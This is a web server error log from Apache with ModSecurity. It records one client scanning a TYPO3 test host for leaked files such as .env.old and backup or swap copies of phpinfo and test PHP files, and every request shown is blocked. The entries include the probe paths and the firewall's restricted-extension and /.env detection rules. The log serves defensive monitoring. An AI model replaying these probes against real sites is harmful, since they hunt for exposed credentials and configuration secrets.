[Sat Nov 22 00:06:13.031492 2025] [:error] [pid 243400] [client 3.9.175.83:59706] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aSDwZfeCuJGFTSZ93xy5ZAAAAAU"]
[Sat Nov 22 00:06:13.031653 2025] [:error] [pid 243400] [client 3.9.175.83:59706] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aSDwZfeCuJGFTSZ93xy5ZAAAAAU"]
[Sat Nov 22 00:06:13.031864 2025] [:error] [pid 243400] [client 3.9.175.83:59706] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aSDwZfeCuJGFTSZ93xy5ZAAAAAU"]
[Sat Nov 22 00:06:13.032046 2025] [:error] [pid 243400] [client 3.9.175.83:59706] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aSDwZfeCuJGFTSZ93xy5ZAAAAAU"]
[Sat Nov 22 00:06:13.103457 2025] [authz_core:error] [pid 243398] [client 3.9.175.83:59624] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/vendor
[Sat Nov 22 00:06:13.545877 2025] [:error] [pid 243406] [client 3.9.175.83:59820] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aSDwZWimBAB8Pgv0sJyurQAAAAc"]
[Sat Nov 22 00:06:13.546076 2025] [:error] [pid 243406] [client 3.9.175.83:59820] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aSDwZWimBAB8Pgv0sJyurQAAAAc"]
[Sat Nov 22 00:06:13.546331 2025] [:error] [pid 243406] [client 3.9.175.83:59820] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aSDwZWimBAB8Pgv0sJyurQAAAAc"]
[Sat Nov 22 00:06:13.546579 2025] [:error] [pid 243406] [client 3.9.175.83:59820] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aSDwZWimBAB8Pgv0sJyurQAAAAc"]
[Sat Nov 22 00:06:32.699952 2025] [authz_core:error] [pid 243400] [client 3.9.175.83:38324] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php.bak
[Sat Nov 22 00:06:32.914380 2025] [authz_core:error] [pid 243409] [client 3.9.175.83:38368] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php.bak
[Sat Nov 22 00:06:32.991101 2025] [:error] [pid 243340] [client 3.9.175.83:38346] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aSDweJeLEhOLAInnw0NqiAAAAAA"]
[Sat Nov 22 00:06:32.991434 2025] [:error] [pid 243340] [client 3.9.175.83:38346] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aSDweJeLEhOLAInnw0NqiAAAAAA"]
[Sat Nov 22 00:06:32.991627 2025] [:error] [pid 243340] [client 3.9.175.83:38346] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aSDweJeLEhOLAInnw0NqiAAAAAA"]
[Sat Nov 22 00:06:33.012073 2025] [authz_core:error] [pid 243411] [client 3.9.175.83:38382] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php.bak
[Sat Nov 22 00:06:33.188580 2025] [authz_core:error] [pid 243400] [client 3.9.175.83:38276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php.bak
[Sat Nov 22 00:06:33.311227 2025] [:error] [pid 243342] [client 3.9.175.83:38540] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aSDweSbqTrlsHApMKqWIlQAAAAI"]
[Sat Nov 22 00:06:33.311620 2025] [:error] [pid 243342] [client 3.9.175.83:38540] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aSDweSbqTrlsHApMKqWIlQAAAAI"]
[Sat Nov 22 00:06:33.311804 2025] [:error] [pid 243342] [client 3.9.175.83:38540] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aSDweSbqTrlsHApMKqWIlQAAAAI"]
[Sat Nov 22 00:06:34.073268 2025] [:error] [pid 243343] [client 3.9.175.83:38710] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aSDweoNKGNllPFPT2VHkogAAAAY"]
[Sat Nov 22 00:06:34.073615 2025] [:error] [pid 243343] [client 3.9.175.83:38710] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aSDweoNKGNllPFPT2VHkogAAAAY"]
[Sat Nov 22 00:06:34.073792 2025] [:error] [pid 243343] [client 3.9.175.83:38710] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aSDweoNKGNllPFPT2VHkogAAAAY"]
[Sat Nov 22 00:06:39.938937 2025] [:error] [pid 243341] [client 3.9.175.83:41800] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aSDwfwqyqiDG5tICQX6nrgAAAAE"]
[Sat Nov 22 00:06:39.939296 2025] [:error] [pid 243341] [client 3.9.175.83:41800] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aSDwfwqyqiDG5tICQX6nrgAAAAE"]
[Sat Nov 22 00:06:39.939483 2025] [:error] [pid 243341] [client 3.9.175.83:41800] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aSDwfwqyqiDG5tICQX6nrgAAAAE"]
[Sat Nov 22 00:06:39.954081 2025] [:error] [pid 243406] [client 3.9.175.83:41818] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aSDwf2imBAB8Pgv0sJyusAAAAAc"]
[Sat Nov 22 00:06:39.954454 2025] [:error] [pid 243406] [client 3.9.175.83:41818] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aSDwf2imBAB8Pgv0sJyusAAAAAc"]
[Sat Nov 22 00:06:39.954630 2025] [:error] [pid 243406] [client 3.9.175.83:41818] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aSDwf2imBAB8Pgv0sJyusAAAAAc"]
[Sat Nov 22 00:06:40.021465 2025] [:error] [pid 243400] [client 3.9.175.83:41884] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aSDwgPeCuJGFTSZ93xy5aAAAAAU"]
[Sat Nov 22 00:06:40.021836 2025] [:error] [pid 243400] [client 3.9.175.83:41884] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aSDwgPeCuJGFTSZ93xy5aAAAAAU"]
[Sat Nov 22 00:06:40.022023 2025] [:error] [pid 243400] [client 3.9.175.83:41884] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aSDwgPeCuJGFTSZ93xy5aAAAAAU"]
[Sat Nov 22 00:06:40.108749 2025] [:error] [pid 243343] [client 3.9.175.83:41900] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aSDwgINKGNllPFPT2VHkowAAAAY"]
[Sat Nov 22 00:06:40.109143 2025] [:error] [pid 243343] [client 3.9.175.83:41900] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aSDwgINKGNllPFPT2VHkowAAAAY"]
[Sat Nov 22 00:06:40.109342 2025] [:error] [pid 243343] [client 3.9.175.83:41900] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aSDwgINKGNllPFPT2VHkowAAAAY"]
[Sat Nov 22 00:06:40.114279 2025] [authz_core:error] [pid 243342] [client 3.9.175.83:41854] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php~
[Sat Nov 22 00:06:40.129098 2025] [authz_core:error] [pid 243341] [client 3.9.175.83:41870] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php~
[Sat Nov 22 00:06:40.164045 2025] [authz_core:error] [pid 243406] [client 3.9.175.83:41950] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php~
[Sat Nov 22 00:06:40.171858 2025] [authz_core:error] [pid 243344] [client 3.9.175.83:41860] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php.swp
[Sat Nov 22 00:06:40.243113 2025] [authz_core:error] [pid 243400] [client 3.9.175.83:41982] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php.swp
[Sat Nov 22 00:06:40.290741 2025] [:error] [pid 243340] [client 3.9.175.83:41948] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aSDwgJeLEhOLAInnw0NqigAAAAA"]
[Sat Nov 22 00:06:40.291078 2025] [:error] [pid 243340] [client 3.9.175.83:41948] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aSDwgJeLEhOLAInnw0NqigAAAAA"]
